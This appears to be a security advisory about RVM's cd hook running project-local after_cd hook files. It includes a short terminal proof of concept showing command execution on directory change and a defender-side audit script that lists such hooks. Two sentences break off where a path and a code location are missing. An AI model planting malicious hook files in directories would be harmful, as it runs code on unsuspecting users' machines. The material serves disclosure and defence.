RVM, by default, hooks the cd command and automatically executes various auxiliary hooks when a user changes into a directory. The mechanics of these additional after_cd hooks are detailed at <https://rvm.io/workflow/hooks>.
What that page does not mention is that, as of a vulnerable version, hooks are loaded not only from ~/.rvm/hooks but also from
as per the code, as of a vulnerable commit, at
This behaviour can be used to achieve arbitrary command execution when a user changes into a directory with malicious contents.
Note that hook files must be executable for them to be triggered.
```text
rvm@e6aeaf6d79ec:~$ mkdir -p poc/.rvm/hooks
rvm@e6aeaf6d79ec:~$ cat > poc/.rvm/hooks/after_cd_poc
echo "Command execution as $(id)"
^D
rvm@e6aeaf6d79ec:~$ chmod a+x poc/.rvm/hooks/after_cd_poc
rvm@e6aeaf6d79ec:~$ cd poc
Command execution as uid=1000(rvm) gid=1000(rvm) groups=1000(rvm)
rvm@e6aeaf6d79ec:~/poc$
```
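A defender-side audit helper, added here and not part of the original report or of RVM itself: it lists executable after_cd hook files in any .rvm/hooks directory beneath a given path (for example an untrusted checkout, before changing into it), applying the caveat above by ignoring hook files that lack the executable bit. The function names and the directory layout it checks (`<dir>/.rvm/hooks/after_cd*`, as in the PoC) are assumptions.

```shell
#!/usr/bin/env bash
# Audit helper (added example, not code from the original report or from RVM).
# Lists executable after_cd hook files under any .rvm/hooks directory beneath
# the given root. Only executable files are reported, because RVM only
# triggers hook files that carry the executable bit.
find_rvm_after_cd_hooks() {
    local root="${1:-.}"
    # Match the project-local layout used in the PoC: <dir>/.rvm/hooks/after_cd*
    find "$root" -path '*/.rvm/hooks/after_cd*' -type f 2>/dev/null | sort |
    while IFS= read -r hook; do
        # A non-executable hook file is inert, so skip it.
        [ -x "$hook" ] && printf '%s\n' "$hook"
    done
}

# Returns 0 when no executable after_cd hooks exist under the path, 1 otherwise.
# Intended as a pre-cd check for checkouts from untrusted sources.
rvm_hooks_clean() {
    [ -z "$(find_rvm_after_cd_hooks "${1:-.}")" ]
}

# Stand-alone usage: audit the path given on the command line.
if [ $# -gt 0 ]; then
    if rvm_hooks_clean "$1"; then
        echo "no executable after_cd hooks under $1"
    else
        echo "executable after_cd hooks found under $1:"
        find_rvm_after_cd_hooks "$1"
    fi
fi
```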